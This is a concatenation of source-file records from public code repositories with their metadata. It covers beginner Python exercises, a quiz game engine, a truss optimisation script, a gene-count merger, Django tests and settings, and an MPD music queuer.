"null": {"level": "DEBUG", "class": "logging.NullHandler"},
},
"loggers": {
"root": {"handlers": ["console"], "level": "INFO"},
"django.security.DisallowedHost": {"handlers": ["null"], "propagate": False},
"django.request": {"handlers": ["console"], "level": "ERROR"},
},
}
TMDB_API_TOKEN = env("TMDB_API_TOKEN")
| [
"danjac2018@gmail.com"
] | danjac2018@gmail.com |
e741f7a488bff74efe84240a5e4692abe1917623 | 3caf59afaee9fa1728771ea6f0a1dc2c745e4106 | /ex38.py | d0cb8ba61ad467311a915b7f5bdd06c4b131615a | [
"MIT"
] | permissive | KhinYadanaThein/python-exercises | e717bd2a4ebcefc70ca4cb6a793a18784e9c02af | 0df54fac879b2cdffe0b3c47539203780bb96202 | refs/heads/master | 2020-03-19T08:02:29.984118 | 2018-06-26T07:35:38 | 2018-06-26T07:35:38 | 136,170,431 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | ten_things = "Apples Oranges Crows Telephone Light Sugar"
print("Wait there are not 10 things in that list. Let's fix that.")
stuff = ten_things.split(' ')
more_stuff = ["Day", "Night", "Song", "Frisbee",
"Corn", "Banana", "Girl", "Boy"]
while len(stuff) != 10:
next_one = more_stuff.pop()
print("Adding: ", next_one)
stuff.append(next_one)
print(f"There are {len(stuff)} items now.")
print("There we go : ",stuff)
print("Let's do some things with stuff.")
print(stuff[1])
print(stuff[-1])
print(stuff.pop())
print(' '.join(stuff))
print('#'.join(stuff[3:5]))
| [
"angelchit35@gmail.com"
] | angelchit35@gmail.com |
cbada4cfa619707cbcc95167d3cfe9efdcc9ce8c | 6caa876033cb8059f42db6dd4505a10a4745509a | /brain_games/engine.py | 6aa4675fb3e95168b7abfca9783c9f7f0dc2b51e | [
"MIT"
] | permissive | vetalpaprotsky/brain-games | 5d066a35054956761119b4f8465fdd6b7cc7b808 | 42136c6d32931ff25f92dbb3b11d890746b85d1c | refs/heads/master | 2023-01-09T20:56:26.245825 | 2020-11-14T16:16:57 | 2020-11-14T16:16:57 | 275,587,849 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,010 | py | from brain_games import cli
import prompt
def ask_question_to_user(question):
print('Question: {}'.format(question))
return prompt.string('Your answer: ').strip().lower()
def play_game_loop(game, user_name):
ANSWERS_TO_WIN_COUNT = 3
correct_answers_count = 0
while correct_answers_count < ANSWERS_TO_WIN_COUNT:
question, correct_answer = game.get_question_and_correct_answer()
user_answer = ask_question_to_user(question)
if user_answer == str(correct_answer):
correct_answers_count += 1
print('Correct!')
else:
print("'{}' is wrong answer ;(. Correct answer was '{}'".format(
user_answer, correct_answer
))
print("Let's try again, {}!".format(user_name))
print('Congratulations, {}!'.format(user_name))
def play(game):
cli.show_greeting_message()
print(game.DESCRIPTION, '\n')
user_name = cli.welcome_user()
print()
play_game_loop(game, user_name)
| [
"vetalpaprotsky@gmail.com"
] | vetalpaprotsky@gmail.com |
b5192c6662f687528248a77860aafc8d46c56afb | a8ce1de3d85c54310d021a6b170b34aeaa56a2ad | /Subtruss Optimisation 5 (member type-n).py | 9b9da441257e917f38f9e3063d619f773afbb417 | [] | no_license | sskii/DP3-Utilities | 4da7cd9a639249d0bede1a174f5b83d9d2586a0e | cf85ff2b516be8d2acee003a73a5335b2e7537f7 | refs/heads/main | 2023-05-04T23:20:26.496009 | 2021-05-22T05:57:03 | 2021-05-22T05:57:03 | 368,024,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,504 | py |
# EXPERIMENTAL CODE ONLY!!!
# this is essentially Optimisation 1 but I'm trying to port it to spit out data for member type-n instead.
import math
print("\nTHIS CODE IS EXPERIMENTAL. Do NOT use it for calculations without manual verification!")
stLength = float(input("Please input subtruss length in mm:\f")) # Subtruss length, mm
#nTriangles = [int(input("Please input the number of triangles:\f"))] # Subtruss section count, ul
nTriangles = [2, 4, 6, 8] # array of possibilities to try
outputBuffer = "" # output buffer so that all the useful stuff gets printed last
# We need to find the first value of theta that satisfies the following:
# (sinθ)(cosθ)^2 = (115 stLength^2) / (k nTriangles^2)
# member compression multipliers
multipliers = [1, 8, ]
k = (200) * ((60) ** 2) # compression constant
k *= 8 # because compression members are type 2
phi = 0.8 # reduction factor
DP = int(input("Please input desired answer precision in DP:\f")) # decimal answer precision in DP
thetaStep = math.radians(10 ** (-1 * DP)) # because python works in radians!
print("Stepping", thetaStep, "radians per iteration.")
# METHOD #
# We will first evaluate the RHS of the expression. Then we'll evaluate values of theta from zero
# until the LHS is greater than the RHS, at which point we return theta.
print("\n* * *\n")
for n in nTriangles:
print("Beginning evaluation of", n, "triangles.")
RHS = (115 * (stLength ** 2)) / (k * (n ** 2))
#print("RHS =", RHS)
theta = 0 # test theta
run = True # flag
while run:
if theta > math.radians(90):
# inputs are invalid somehow
print("No solutions found; add more triangles.")
# report this
outputBuffer += str(n)
outputBuffer += " (No valid solutions)\n"
run = False
LHS = (math.sin(theta)) * ((math.cos(theta)) ** 2)
#print("LHS =", LHS, " when θ =", math.degrees(theta))
if LHS > RHS:
#solution found
print("Solution found. θ =", round(math.degrees(theta), DP))
# calc expected subtruss capacity
stMaxCompLoad = (2 * k * phi * (math.cos(theta) ** 3) * (n ** 2)) / (stLength ** 2)
stMaxTensLoad = (230 * phi) / (math.tan(theta))
# calc member lengths
diagLength = (stLength) / (n * math.cos(theta))
vertLength = (2 * stLength * math.tan(theta)) / (n)
# print to console
print("Diagonal members measure", diagLength, "mm and allow truss to support", stMaxCompLoad, "N.")
print("Vertical members measure", vertLength, "mm and allow truss to support", stMaxTensLoad, "N.")
# write the solutions out
outputBuffer += str(n)
outputBuffer += " "
outputBuffer += str(round(math.degrees(theta), DP))
outputBuffer += " ("
outputBuffer += (str(round(stMaxCompLoad, 2)) + ", " + str(round(stMaxTensLoad, 2)))
outputBuffer += ") ("
outputBuffer += (str(round(diagLength, 2)) + ", " + str(round(vertLength, 2)))
outputBuffer += ")\n"
run = False
else:
#no solution found
theta += thetaStep # increment theta
print("Finished evaluating for", n, "triangles.\n")
#done
print("* * *\n\nExecution finished!")
print("Solutions for", stLength, "mm subtruss:\n\nTriangles: Half of enclosed angle: Capacity (diags, verts)^ Length (diags, verts)")
print(outputBuffer)
print("^ Calculated capacity is valid for subtruss loading under compression assuming all constituent members are type-1. Values given in newtons. Take the lower of the two.") | [
"30613658+sskii@users.noreply.github.com"
] | 30613658+sskii@users.noreply.github.com |
751b86162060e58181694cc6ac5e6f1e99006534 | e79614940fa7bc6973b823421839a8dc7b5491c7 | /testchild.py | 75a2646781c3095a2a342fd6417f3e57c9d6055e | [] | no_license | HarishsGit/IBMTestRepo | 1c2dc701b7ad0d63af29e2326310f793f85ccd96 | 3907cd7c8945033b566aecd5dd3967336067f6c1 | refs/heads/main | 2023-04-08T21:36:11.971177 | 2021-04-20T19:59:30 | 2021-04-20T19:59:30 | 359,679,751 | 0 | 0 | null | 2021-04-20T19:59:31 | 2021-04-20T04:07:27 | Python | UTF-8 | Python | false | false | 65 | py | ### Adding new File to Child Branch
print("Inside Child Branch")
| [
"noreply@github.com"
] | HarishsGit.noreply@github.com |
e48c0ad44f4e4374d39d4bfcd592ab094d217514 | c4bfbffb8c5c0fc22fe749440bc434e155f4130d | /posts/migrations/0001_initial.py | d1521b9bdb9e00c40796f4a937c83440a1c72bf5 | [] | no_license | sunil-ks/mb-app | d77e24c30522884fd9228db13144414c3bd8560e | d99388580a0d5bc031f45b56915ec1471807eac2 | refs/heads/master | 2023-02-12T01:50:23.708915 | 2021-01-16T09:39:55 | 2021-01-16T09:39:55 | 330,127,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 468 | py | # Generated by Django 3.0 on 2021-01-16 06:59
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('text', models.TextField()),
],
),
]
| [
"sunil.ks@codemonk.in"
] | sunil.ks@codemonk.in |
f06041b50819619886d0638a49e9127cfa5c1ad5 | a9742ec68a558d8c1e959ba3f55d2f5bbdaaaa67 | /HTSeqMerger.py | 8db5c6a212dced203176468d27c44793ebea5ac2 | [] | no_license | Joenetics/N.Crassa_25-28C | bc4521bd1058a0ed35513a8e316e32ca6835ff03 | 37426b517290ea85e86c6249556e501aec1fcd89 | refs/heads/master | 2021-01-23T10:04:56.504370 | 2017-09-06T12:44:58 | 2017-09-06T12:44:58 | 102,604,797 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,539 | py | #Open a number of HTSeqFiles, then merge their counts per gene; this is for RStudio packages that require merged CSVs.
#This is for 40 wells. I'm not sure how to create variable names in a loop in Python... plus, no regularity in naming files. so, i did it manually.
HTSeqFile1 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV01_rep01_htseq_count",'r')
HTSeqFile2 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV01_rep02_htseq_count",'r')
HTSeqFile3 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV02_rep01_htseq_count",'r')
HTSeqFile4 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV02_rep02_htseq_count",'r')
HTSeqFile5 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV03_rep01_htseq_count",'r')
HTSeqFile6 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV03_rep02_htseq_count",'r')
HTSeqFile7 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV04_rep01_htseq_count",'r')
HTSeqFile8 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV04_rep02_htseq_count",'r')
HTSeqFile9 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV05_rep01_htseq_count",'r')
HTSeqFile10 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV05_rep02_htseq_count",'r')
HTSeqFile11 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV06_rep01_htseq_count",'r')
HTSeqFile12 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV06_rep02_htseq_count",'r')
HTSeqFile13 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV07_rep01_htseq_count",'r')
HTSeqFile14 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV07_rep02_htseq_count",'r')
HTSeqFile15 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV08_rep01_htseq_count",'r')
HTSeqFile16 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV08_rep02_htseq_count",'r')
HTSeqFile17 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV09_rep01_htseq_count",'r')
HTSeqFile18 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV09_rep02_htseq_count",'r')
HTSeqFile19 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV10_rep01_htseq_count",'r')
HTSeqFile20 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV10_rep02_htseq_count",'r')
HTSeqFile21 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV11_rep01_htseq_count",'r')
HTSeqFile22 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV11_rep02_htseq_count",'r')
HTSeqFile23 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV12_rep01_htseq_count",'r')
HTSeqFile24 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV12_rep02_htseq_count",'r')
HTSeqFile25 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV13_rep01_htseq_count",'r')
HTSeqFile26 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV13_rep02_htseq_count",'r')
HTSeqFile27 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV14_rep01_htseq_count",'r')
HTSeqFile28 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV14_rep02_htseq_count",'r')
HTSeqFile29 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV15_rep01_htseq_count",'r')
HTSeqFile30 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV15_rep02_htseq_count",'r')
HTSeqFile31 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV16_rep01_htseq_count",'r')
HTSeqFile32 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV16_rep02_htseq_count",'r')
HTSeqFile33 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV17_rep01_htseq_count",'r')
HTSeqFile34 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV17_rep02_htseq_count",'r')
HTSeqFile35 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV18_rep01_htseq_count",'r')
HTSeqFile36 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV18_rep02_htseq_count",'r')
HTSeqFile37 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV19_rep01_htseq_count",'r')
HTSeqFile38 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV19_rep02_htseq_count",'r')
HTSeqFile39 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV20_rep01_htseq_count",'r')
HTSeqFile40 = open("/Users/langyy/Desktop/Differential_expression/htseq_count/MV20_rep02_htseq_count",'r')
outputfile = open("/Users/Neurospora/Desktop/Joseph_Things/MergedHTSeq.txt", 'w')
outputfile2 = open("/Users/Neurospora/Desktop/Joseph_Things/GeneNames.txt", 'w')
MIGHTYDICTIONARY = {}
MightyList = [HTSeqFile1, HTSeqFile2, HTSeqFile3, HTSeqFile4, HTSeqFile5, HTSeqFile6, HTSeqFile7, HTSeqFile8, HTSeqFile9, HTSeqFile10,
HTSeqFile11, HTSeqFile12, HTSeqFile13, HTSeqFile14, HTSeqFile15, HTSeqFile16, HTSeqFile17, HTSeqFile18, HTSeqFile19, HTSeqFile20,
HTSeqFile21, HTSeqFile22, HTSeqFile23, HTSeqFile24, HTSeqFile25, HTSeqFile26, HTSeqFile27, HTSeqFile28, HTSeqFile29, HTSeqFile30,
HTSeqFile31, HTSeqFile32, HTSeqFile33, HTSeqFile34, HTSeqFile35, HTSeqFile36, HTSeqFile37, HTSeqFile38, HTSeqFile39, HTSeqFile40]
GeneNames = []
for line in HTSeqFile1:
word = line.split("\t")
MIGHTYDICTIONARY[word[0]] = (word[1]).strip()
GeneNames.append(word[0])
previousnumbers = str
for i in range(1,40):
for line in MightyList[i]:
word = line.split("\t")
previousnumbers = MIGHTYDICTIONARY[word[0]] + "\t"
MIGHTYDICTIONARY[word[0]] = previousnumbers + (word[1]).strip()
print("VVD25DD0R1", "VVD25DD0R2", "VVD25DD4R1", "VVD25DD4R2", "VVD25DD8R1", "VVD25DD8R2", "VVD25DD12R1", "VVD25DD12R2", "VVD25DD16R1", "VVD25DD16R2",
"VVD28DD0R1", "VVD28DD0R2", "VVD28DD4R1", "VVD28DD4R2", "VVD28DD8R1", "VVD28DD8R2", "VVD28DD12R1", "VVD28DD12R2", "VVD28DD16R1", "VVD28DD16R2",
"WT25DD0R1", "WT25DD0R2", "WT25DD4R1", "WT25DD4R2", "WT25DD8R1", "WT25DD8R2", "WT25DD12R1", "WT25DD12R2", "WT25DD16R1", "WT25DD16R2",
"WT28DD0R1", "WT28DD0R2", "WT28DD4R1", "WT28DD4R2", "WT28DD8R1", "WT28DD8R2", "WT28DD12R1", "WT28DD12R2", "WT28DD16R1", "WT28DD16R2", sep = "\t", file = outputfile)
for i in range(0, len(GeneNames)):
print(GeneNames[i], file= outputfile2)
print(MIGHTYDICTIONARY[GeneNames[i]], "\n", sep = '', file= outputfile)
| [
"noreply@github.com"
] | Joenetics.noreply@github.com |
146bf001cc5f3214112f5172ac029e9870f52731 | 6fa775fa81d8aadc9cb1351e980508e0b623dec7 | /bingo_backend/BoardManagement/test_board_management.py | c1578f7873d3c6eef0b62180dee49ad1152ce2a9 | [] | no_license | francica/iOSGameAPI-Backend | 322a267a0d2650b471ab0bfc6994649804ab1f8e | ccaef36abad222ee7cf46d9dda3032829e1db0bf | refs/heads/master | 2021-01-19T04:44:23.000049 | 2016-04-25T01:13:43 | 2016-04-25T01:13:43 | 69,634,126 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,477 | py | from unittest import TestCase
__author__ = 'Robert'
from board_management import BoardManagement
import json
class TestBoardManagement(TestCase):
def test_add_new_game_board(self):
bm=BoardManagement()
bm.add_new_game_board(None, None,1)
self.assertEqual(None,bm.game_board[1].board_segment_list[0].pen.pen_color)
self.assertEqual(1,bm.game_board[1].board_id)
def test_update_pen(self):
bm=BoardManagement()
bm.add_new_game_board(None,None,1)
data={}
data['pen_color']=(128,256,120)
data['pen_width']=.25
data['room_id']=1
json_data=json.dumps(data)
bm.update_pen(json_data)
self.assertEqual(.25,bm.game_board[1].board_segment_list[1].pen.pen_width)
self.assertEqual(2,bm.game_board[1].board_id)
def test_update_board(self):
bm=BoardManagement()
bm.add_new_game_board(None,None,1)
data={}
data['pen_color']=(128,256,120)
data['pen_width']=.25
data['room_id']=1
json_data=json.dumps(data)
bm.update_pen(json_data)
data['start_point']=(2,2)
data['end_point']=(4,3)
data['room_id']=1
json_data=json.dumps(data)
bm.update_board(json_data)
self.assertEqual(data['start_point'][0],bm.game_board[1].board_segment_list[1].pixels_changed[0][0])
def test_get_board(self):
bm=BoardManagement()
bm.add_new_game_board((255,255,255),.5,1)
data={}
data['pen_color']=(128,256,120)
data['pen_width']=.25
data['room_id']=1
json_data=json.dumps(data)
bm.update_pen(json_data)
data['start_point']=(2,2)
data['end_point']=(4,3)
data['room_id']=1
json_data=json.dumps(data)
bm.update_board(json_data)
# making a second board
data['pen_color']=(54,3,4)
data['pen_width']=.2
data['room_id']=1
json_data=json.dumps(data)
bm.update_pen(json_data)
data['start_point']=(3,9)
data['end_point']=(43,23)
data['room_id']=1
json_data=json.dumps(data)
bm.update_board(json_data)
# making a third board
data['pen_color']=(2,29,4)
data['pen_width']=.8
data['room_id']=1
json_data=json.dumps(data)
bm.update_pen(json_data)
data['start_point']=(12,9)
data['end_point']=(45,231)
data['room_id']=1
json_data=json.dumps(data)
bm.update_board(json_data)
# making get_board json obj
data['room_id']=1
data['board_id']=1
json_data=json.dumps(data)
json_str=bm.get_board(json_data)
print(json_str)
| [
"robertfinedore@gmail.com"
] | robertfinedore@gmail.com |
f97f994caeaabd7001c98a15ab0099771313d83d | 99dbbe9d1d47125d3e30be50721872749dc4e071 | /simple-dist.py | 53241fa04a37605202e26096e7e5d9834bea5d67 | [] | no_license | rcbeneduce/aba-structural-analysis | 135ee0a844fa049ea0c50096622b4cd63bb10c45 | e9ebe2687075e8c91430265892798e49a1906263 | refs/heads/master | 2023-02-19T17:50:36.430929 | 2021-01-21T03:45:51 | 2021-01-21T03:45:51 | 270,466,827 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,096 | py | #This section of code is for defining the simply span beam of a distributed load
def simpledistbeam(w,L,x,a,b,E,I):
if(complex2=='1'):
supportA=w*L/2
supportB=w*L/2*-1
def shear(x):
return w*((L/2)-x)
def bending(x):
return(w*x/2)*(L-x)
def deflection(x):
return((w*x)/(24*E*I))*((L**3)-(2*L*x**2)+(x**3))
elif(right=='1'):
supportA=w/3
supportB=2*w/3*-1
def shear(x):
return(w/3)-((w*x**2)/L**2)
def bending(x):
return(w*x)/(3*L**2)*((L**2)-(x**2))
def deflection(x):
return((w*x)/(180*E*I*L**2))*((3*x**4)-(10*L**2*x**2)+(7*L**4))
elif(right=='0'):
supportA=w/2
supportB=w/2*-1
if (x<=(L/2)):
def shear(x):
return(w/(2*L**2))*((L**2)-(4*x**2))
def bending(x):
return w*x*(0.5-((2*x**2)/(3*L**2)))
def deflection(x):
return((w*x)/(480*E*I*L**2))*((5*L**2)-(4*x**2))**2
elif(x>(L/2)):
def shear(x):
return (w/(2*L**2))*((L**2)-(4*(L-x)**2))
def bending(x):
return w*(L-x)*(0.5-((2*(L-x)**2)/(3*L**2)))
def deflection(x):
return ((w*(L-x))/(480*E*I*L**2))*((5*L**2)-(4*(L-x)**2))**2
print ('The reaction force at support A is:',round(supportA,5),'kips')
print ('The reaction force at support B is:',round(supportB,5),'kips')
print ('The shear force at',x,'inches is:',round(shear(x),5),'kips')
print ('The bending moment at',x,'inches is:',round(bending(x),5),'kips-in')
print ('The deflection of the beam at',x,'inches is:',round(deflection(x),5),'inches')
#This section of code is for graphical representation.
G=np.arange(0.0,L,0.01)
P=np.arange(0.0,(L/2),0.01)
N=np.arange((L/2),L,0.01)
if (complex=='no' or right=='1'):
plt.subplot(313)
plt.plot(G,-1*deflection(G),'r')
plt.plot(G,(G*0),'k')
plt.xlabel('Length (in.)')
plt.ylabel('Deflection (in)')
plt.grid(True)
plt.fill_between(G,-1*deflection(G),alpha=0.2, hatch = '/')
plt.subplot(311)
plt.title('Analysis of your Member')
plt.plot(G,shear(G),'r')
plt.plot(G,(G*0),'k')
plt.ylabel('Shear (kips)')
plt.grid(True)
plt.fill_between(G,shear(G),alpha=0.2, hatch = '/')
plt.subplot(312)
plt.plot(G,bending(G),'r')
plt.plot(G,(G*0),'k')
plt.ylabel('Bending Moment (kips-in)')
plt.grid(True)
plt.fill_between(G,bending(G),alpha=0.2, hatch = '/')
plt.tight_layout()
plt.show()
elif(right=='0'):
def Sp(x):
return(w/(2*L**2))*((L**2)-(4*x**2))
def Sn(x):
return(w/(2*L**2))*((L**2)-(4*(L-x)**2))*-1
def Mp(x):
return w*x*(0.5-((2*x**2)/(3*L**2)))
def Mn(x):
return w*(L-x)*(0.5-((2*(L-x)**2)/(3*L**2)))
def Dp(x):
return((w*x)/(480*E*I*L**2))*((5*L**2)-(4*x**2))**2*-1
def Dn(x):
return((w*(L-x))/(480*E*I*L**2))*((5*L**2)-(4*(L-x)**2))**2*-1
plt.subplot(313)
plt.plot(P,Dp(P),'r')
plt.plot(N,Dn(N),'r')
plt.xlabel('Length (in.)')
plt.ylabel('Deflection (in)')
plt.grid(True)
plt.plot(G,(G*0),'k')
plt.fill_between(P,Dp(P),alpha=0.2, hatch = '/')
plt.fill_between(N,Dn(N),alpha=0.2, hatch = '/')
plt.subplot(311)
plt.plot(P,Sp(P),'r')
plt.plot(N,Sn(N),'r')
plt.title('Analysis of your Member')
plt.plot(G,(G*0),'k')
plt.ylabel('Shear (kips)')
plt.grid(True)
plt.fill_between(P,Sp(P),alpha=0.2, hatch = '/')
plt.fill_between(N,Sn(N),alpha=0.2, hatch = '/')
plt.subplot(312)
plt.plot(P,Mp(P),'r')
plt.plot(N,Mn(N),'r')
plt.plot(G,(G*0),'k')
plt.ylabel('Bending Moment (kips-in)')
plt.grid(True)
plt.fill_between(P,Mp(P),alpha=0.2, hatch = '/')
plt.fill_between(N,Mn(N),alpha=0.2, hatch = '/')
plt.tight_layout()
plt.show()
return
| [
"noreply@github.com"
] | rcbeneduce.noreply@github.com |
ae09834689a7ed3701d3ef9439f82ccc31caa63b | 3e4d78628a66927e2a640ca4f328adcc31e156b9 | /deejay/queuer.py | be6d7a434cdd0da2d3e15b533b77f38a4bf36a50 | [] | no_license | nijotz/shitstream | 360d41a1411dc480dd220790f9513d202a18ee78 | 7d11171fb35aaf6d778d5bf23046d220939711be | refs/heads/master | 2021-01-01T16:19:22.224760 | 2014-10-16T22:48:17 | 2014-10-16T22:48:17 | 23,303,299 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,892 | py | import os
import re
import pyechonest.config
import pyechonest.song
import pyechonest.playlist
from downloaders.youtube import search as youtube_search
from mpd_util import mpd
from server import app
import settings
pyechonest.config.CODEGEN_BINARY_OVERRIDE = settings.dj_codegen_binary
pyechonest.config.ECHO_NEST_API_KEY = settings.dj_echonest_api_key
logger = app.logger
@mpd
def queuer(mpdc):
while True:
try:
if should_queue(mpdc=mpdc):
logger.info('Should queue, dewin it')
queue_shit(mpdc=mpdc)
else:
logger.info('Should not queue')
logger.info('Queuer waiting')
mpdc.idle(['playlist', 'player'])
except Exception as e:
logger.exception(e)
logger.error('Queuer failure, starting over')
@mpd
def should_queue(mpdc):
current_song = mpdc.currentsong()
if not current_song:
return False
current_pos = int(current_song.get('pos'))
queue = mpdc.playlistinfo()
next_songs = filter(lambda x: int(x.get('pos')) >= current_pos, queue)
timeleft = reduce(lambda x, y: x + float(y.get('time')), next_songs, 0)
timeleft -= float(mpdc.status().get('elapsed', 0))
if timeleft < (60 * 10):
return True
return False
@mpd
def prev_songs(mpdc, num=5):
"Get the last songs listened to"
current_song = mpdc.currentsong()
if not current_song:
return []
current_pos = int(current_song.get('pos'))
queue = mpdc.playlistinfo()
queue = filter(lambda x: not x.get('file', '').startswith(settings.dj_bumps_dir), queue) #FIXME: bumps filter needs dry
queue_dict = dict([ (int(song.get('pos')), song) for song in queue ])
sample = []
i = current_pos
while len(sample) < num and i >= 0:
song = queue_dict.get(i)
if song:
sample.append(song)
i -= 1
return sample
@mpd
def queue_shit(mpdc):
prev = prev_songs(mpdc=mpdc)
recs = get_recommendations(prev)
for song in recs:
mpd_songs = mpdc.search('artist', song.artist_name, 'title', song.title)
if mpd_songs:
mpdc.add(mpd_songs[0].get('file'))
continue
mpd_songs = mpdc.search('artist', song.artist_name)
if mpd_songs:
mpdc.add(mpd_songs[0].get('file'))
continue
url = youtube_search(u'{} {}'.format(song.artist_name, song.title))
if url:
from server import add_url #FIXME
def log(x):
logger.info(x)
add_url(url, log)
def find_youtube_vide(song):
pass
def get_recommendations(prev):
songs = []
for song in prev:
more_songs = identify_song(song)
if more_songs:
songs.append(more_songs)
song_ids = [song.id for song in songs]
if not song_ids:
logger.info('No previous songs identified')
return []
logger.info('Identified {} previous songs'.format(len(song_ids)))
result = pyechonest.playlist.static(type='song-radio', song_id=song_ids, results=10)
return result[5:] # Does echonest return the five songs I gave it to seed? Looks like..
@mpd
def identify_song(song, mpdc):
artist = song.get('artist')
title = song.get('title')
if not (artist or title):
return #TODO: try harder
results = pyechonest.song.search(artist=artist, title=title)
if results:
return results[0]
logger.warn(u'No results for: {} - {}'.format(artist,title))
# try stripping weird characters from the names
artist = re.sub(r'([^\s\w]|_)+', '', artist)
title = re.sub(r'([^\s\w]|_)+', '', title)
results = pyechonest.song.search(artist=artist, title=title)
if results:
return results[0]
logger.warn(u'No results for: {} - {}'.format(artist,title))
personality = queuer
| [
"nick@nijotz.com"
] | nick@nijotz.com |
ead879fbe5703ccb2ef942594a46fa24810b29fc | e0c7f307a42a1d0f281b7d5075e54dc92a158635 | /mdp_api/api/apps.py | d510ec033214a0a29066d634211276c8711503af | [
"MIT"
] | permissive | namafutatsu/mdp_api | 53e68ab4ad245d3ba1a28f2aa7860d72063d4b6d | 9cd719bb05a8386f6db5272d650a8e20307ee059 | refs/heads/master | 2021-08-16T18:37:01.144244 | 2020-05-01T09:48:39 | 2020-05-01T09:48:39 | 172,598,415 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | from django.apps import AppConfig
class DefaultConfig(AppConfig):
name = 'mdp_api.api'
label = 'mdp_api_api'
verbose_name = "mdp_api API"
| [
"victor@iso3103.net"
] | victor@iso3103.net |
1223460f79aa83654eb9c6e0e3b50f90b2366482 | a364f53dda3a96c59b2b54799907f7d5cde57214 | /easy/35-Search Insertion Position.py | 6c7c2e089fbf94d023498b845a9645138b07243e | [
"Apache-2.0"
] | permissive | Davidxswang/leetcode | 641cc5c10d2a97d5eb0396be0cfc818f371aff52 | d554b7f5228f14c646f726ddb91014a612673e06 | refs/heads/master | 2022-12-24T11:31:48.930229 | 2020-10-08T06:02:57 | 2020-10-08T06:02:57 | 260,053,912 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,153 | py | """
https://leetcode.com/problems/search-insert-position/
Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.
You may assume no duplicates in the array.
Example 1:
Input: [1,3,5,6], 5
Output: 2
Example 2:
Input: [1,3,5,6], 2
Output: 1
Example 3:
Input: [1,3,5,6], 7
Output: 4
Example 4:
Input: [1,3,5,6], 0
Output: 0
"""
# it is pretty simple, since the array is monotonically increasing, we should check == first
# if not, check <, move toward the end if yes
# if found a nums[i] > target, it indicates that the target is >num[i-1] and target is < nums[i], return i
# if in the end, nothing found, add this target at the end of the original list
# time complexity: O(n), space complexity: O(1)
class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
i = 0
while i < len(nums):
if nums[i] == target:
return i
if nums[i] < target:
i += 1
continue
if nums[i] > target:
return i
return len(nums) | [
"wxs199327@hotmail.com"
] | wxs199327@hotmail.com |
1f9ea3f263e41581d79658b99f75d94333a4d0e1 | d82b8db38cf779b01be58fb9c0f74601b7cfc701 | /code/.env/bin/pasteurize | 08973d09291bc0f003fdd60724c3c29fe315ec75 | [
"MIT"
] | permissive | trantorrepository/3D-Human-Body-Pose-Estimation | ca37cab0d88f333511b03f4cc9dd3336a6df393f | a37e70787166988bbbb2ecdb24f6ed588754b917 | refs/heads/master | 2023-01-12T09:25:20.555027 | 2017-12-22T18:30:34 | 2017-12-22T18:30:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | #!/Users/Simon/Documents/Repos/CS231n/Project/.env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from libpasteurize.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"simon.kalouche@gmail.com"
] | simon.kalouche@gmail.com | |
1446d2b5be361206e6302012f1f4eada1e8e523b | 6fd007bd231aed0e3e9ea5824a606427698c08a4 | /computeBERTSentenceEmbedding.py | f51aa66f6a341b2ee5c67ecdbd581f7619367871 | [
"Apache-2.0",
"LicenseRef-scancode-public-domain"
